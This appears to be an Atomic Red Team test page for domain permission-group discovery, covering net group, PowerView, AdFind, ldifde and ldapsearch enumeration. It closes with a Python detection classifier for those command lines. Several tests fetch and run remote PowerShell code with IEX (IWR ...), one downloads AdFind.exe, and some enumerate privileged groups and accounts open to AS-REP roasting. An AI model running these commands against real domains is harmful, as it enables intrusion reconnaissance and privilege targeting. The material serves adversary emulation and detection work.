
Permission Groups Discovery: Domain Groups

Description from ATT&CK

Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.

Commands such as net group /domain of the Net utility, dscacheutil -q group on macOS, and ldapsearch on Linux can list domain-level groups.

Atomic Tests

Atomic Test #1 - Basic Permission Groups Discovery Windows (Domain)

Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.

Supported Platforms: windows

auto_generated_guid: dd66d77d-8998-48c0-8024-df263dc2ce5d

Inputs:

None

Attack Commands: Run with command_prompt!

net localgroup
net group /domain
net group "enterprise admins" /domain
net group "domain admins" /domain

Atomic Test #2 - Permission Groups Discovery PowerShell (Domain)

Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.

Supported Platforms: windows

auto_generated_guid: 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user | User to identify what groups a user is a member of | string | $env:USERNAME |

Attack Commands: Run with powershell!

get-ADPrincipalGroupMembership #{user} | select name

Atomic Test #3 - Elevated group enumeration using net group (Domain)

Runs the "net group" command, including command aliases and loose typing, to simulate enumeration/discovery of high-value domain groups. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.

Supported Platforms: windows

auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37

Inputs:

None

Attack Commands: Run with command_prompt!

net groups "Account Operators" /doma
net groups "Exchange Organization Management" /doma
net group "BUILTIN\Backup Operators" /doma
net group /domai "Domain Admins"

Atomic Test #4 - Find machines where user has local admin access (PowerView)

Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed.

Supported Platforms: windows

auto_generated_guid: a2d71eee-a353-4232-9f86-54f4288dd8c1

Inputs:

None

Attack Commands: Run with powershell!

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose

Atomic Test #5 - Find local admins on all machines in domain (PowerView)

Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed.

Supported Platforms: windows

auto_generated_guid: a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd

Inputs:

None

Attack Commands: Run with powershell!

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose

Atomic Test #6 - Find Local Admins via Group Policy (PowerView)

Takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed.

Supported Platforms: windows

auto_generated_guid: 64fdb43b-5259-467a-b000-1b02c00e510a

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | hostname of the computer to analyze | path | $env:COMPUTERNAME |

Attack Commands: Run with powershell!

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose

Atomic Test #7 - Enumerate Users Not Requiring Pre Auth (ASRepRoast)

When successful, accounts that do not require Kerberos pre-authentication will be returned.

Supported Platforms: windows

auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b

Inputs:

None

Attack Commands: Run with powershell!

get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}

Dependencies: Run with powershell!

Description: Computer must be domain joined.

Check Prereq Commands:

if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}

Get Prereq Commands:

Write-Host Joining this computer to a domain must be done manually.

Description: Requires the Active Directory module for powershell to be installed.

Check Prereq Commands:

if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}

Get Prereq Commands:

Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"

Atomic Test #8 - Adfind - Query Active Directory Groups

The AdFind tool can be used for reconnaissance in an Active Directory environment. This example has been documented from ransomware actors enumerating Active Directory groups. References: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

Supported Platforms: windows

auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274

Inputs:

None

Attack Commands: Run with command_prompt!

"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=group)

Dependencies: Run with powershell!

Description: AdFind.exe must exist on disk at the specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)

Check Prereq Commands:

if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}

Get Prereq Commands:

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"

Atomic Test #9 - Enumerate Active Directory Groups with Get-AdGroup

The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory. Upon successful execution, a listing of groups will be output with their paths in AD. Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps

Supported Platforms: windows

auto_generated_guid: 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8

Inputs:

None

Attack Commands: Run with powershell!

Get-AdGroup -Filter *

Atomic Test #10 - Enumerate Active Directory Groups with ADSISearcher

The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory. Upon successful execution, a listing of groups will be output with their paths in AD. Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/

Supported Platforms: windows

auto_generated_guid: 9f4e344b-8434-41b3-85b1-d38f29d148d0

Inputs:

None

Attack Commands: Run with powershell!

([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne()

Atomic Test #11 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)

When successful, accounts that do not require Kerberos pre-authentication will be returned. Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html

Supported Platforms: windows

auto_generated_guid: 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8

Inputs:

None

Attack Commands: Run with powershell!

Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name

Dependencies: Run with powershell!

Description: Computer must be domain joined.

Check Prereq Commands:

if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}

Get Prereq Commands:

Write-Host Joining this computer to a domain must be done manually.

Description: Requires the Active Directory module for powershell to be installed.

Check Prereq Commands:

if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}

Get Prereq Commands:

Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"

Atomic Test #12 - Get-DomainGroupMember with PowerView

Utilizing PowerView, run Get-DomainGroupMember to identify the domain users that are members of a group. Upon execution, progress and info about groups within the domain being scanned will be displayed.

Supported Platforms: windows

auto_generated_guid: 46352f40-f283-4fe5-b56d-d9a71750e145

Inputs:

None

Attack Commands: Run with powershell!

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"

Atomic Test #13 - Get-DomainGroup with PowerView

Utilizing PowerView, run Get-DomainGroup to identify the domain groups. Upon execution, groups within the domain will be listed.

Supported Platforms: windows

auto_generated_guid: 5a8a181c-2c8e-478d-a943-549305a01230

Inputs:

None

Attack Commands: Run with powershell!

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose

Atomic Test #14 - Active Directory Enumeration with LDIFDE

Output information from Active Directory to a specified file. Ldifde is a CLI tool for creating, modifying and deleting directory objects. The test is derived from the CISA report on Volt Typhoon. Reference: https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF

Supported Platforms: windows

auto_generated_guid: 22cf8cb9-adb1-4e8c-80ca-7c723dfc8784

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_path | Path to the file that ldifde will output | path | C:\Windows\temp |
| output_file | The filename to be created by ldifde | string | atomic_ldifde.txt |

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

ldifde.exe -f #{output_path}\#{output_file} -p subtree

Cleanup Commands:

del #{output_path}\#{output_file}

Dependencies: Run with powershell!

Description: PowerShell ActiveDirectory Module must be installed

Check Prereq Commands:

Try {
    Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
    exit 0
}
Catch {
    exit 1
}

Get Prereq Commands:

if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
  Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
} else {
  Install-WindowsFeature RSAT-AD-PowerShell
}

Atomic Test #15 - Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS

Output information from ldapsearch. The LDAP password is the admin user's password on Active Directory.

Supported Platforms: linux

auto_generated_guid: d58d749c-4450-4975-a9e9-8b1d562755c2

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | The domain to be tested | string | example |
| top_level_domain | The top level domain (.com, .test, .remote, etc… following domain, minus the .) | string | com |
| user | username@domain of a user | string | user@example.com |
| password | password of the user referenced inside user | string | s3CurePssw0rD! |

Attack Commands: Run with sh!

ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" "(objectClass=group)" -s sub -a always -z 1000 dn

Dependencies: Run with sh!

Description: Packages sssd-ad, sssd-tools, realmd and adcli installed, realm available, and the ldapsearch command present.

Check Prereq Commands:

which ldapsearch

Get Prereq Commands:

echo missing ldapsearch command; exit 1
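Across the tests above, as an added detection example that is not part of this Atomic Red Team page: a Python classifier run over constructed process-creation command lines that labels the domain-group discovery commands these tests execute (net group, AdFind, ldifde, the PowerShell cmdlets). It handles the point test #3 makes, that "net groups" is an alias of "net group" and that the /domain switch can be abbreviated, so a rule keyed on the literal string misses them. The sample command lines, the high-value group list and the label names are assumptions made for this example.

```python
import re

# Constructed command lines modelled on the tests on this page (not real
# telemetry); the last two are benign controls that must not be flagged.
SAMPLE_COMMAND_LINES = [
    'net group "domain admins" /domain',
    'net groups "Account Operators" /doma',
    'net group /domai "Domain Admins"',
    'net group "BUILTIN\\Backup Operators" /doma',
    'net localgroup',
    '"C:\\Tools\\AdFind.exe" -f (objectcategory=group)',
    'ldifde.exe -f C:\\Windows\\temp\\atomic_ldifde.txt -p subtree',
    'powershell.exe -c "Get-ADGroup -Filter *"',
    'net use Z: \\\\fileserver\\share',
    'notepad.exe notes.txt',
]
HIGH_VALUE_GROUPS = {"domain admins", "enterprise admins", "account operators",
                     "backup operators", "exchange organization management"}
# 'net groups' is an alias of 'net group' and net accepts abbreviated switches,
# so a rule keyed on the literal 'net group /domain' misses '/doma' and '/domai'.
NET_GROUP = re.compile(r'^\s*"?(?:[^"\s]*\\)?net(?:\.exe)?"?\s+groups?\b(.*)$', re.I)
DOMAIN_SWITCH = re.compile(r'(?:^|\s)/dom(?:a(?:in?)?)?\b', re.I)
PS_MARKERS = ("get-adgroup", "get-domaingroup", "adsisearcher",
              "get-adprincipalgroupmembership", "objectcategory=group")

def classify(cmdline):
    """Return a label for domain-group discovery, or None for anything else."""
    low = cmdline.lower()
    m = NET_GROUP.match(cmdline)
    if m:
        if not DOMAIN_SWITCH.search(m.group(1)):
            return None  # no /domain switch: not the domain-group query these tests exercise
        quoted = re.findall(r'"([^"]+)"', m.group(1))
        names = {q.lower().split("\\")[-1] for q in quoted}  # drop BUILTIN\ prefix
        return "net-group-domain-highvalue" if names & HIGH_VALUE_GROUPS else "net-group-domain"
    if re.search(r'\bnet(?:\.exe)?\s+localgroup\b', low):
        return "net-localgroup"
    if "adfind" in low and "objectcategory=group" in low:
        return "adfind-group-query"
    if re.search(r'\bldifde(?:\.exe)?\b.*\s-f\s', low):
        return "ldifde-export"
    if any(marker in low for marker in PS_MARKERS):
        return "powershell-group-enum"
    return None

def scan(lines):
    """Return (command line, label) pairs for every line classified as discovery."""
    return [(line, label) for line in lines if (label := classify(line))]
```

Feed scan() the CommandLine field of Sysmon event 1 or Security event 4688 records; the "highvalue" label is the one worth alerting on in a domain where plain group listing is routine admin activity.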
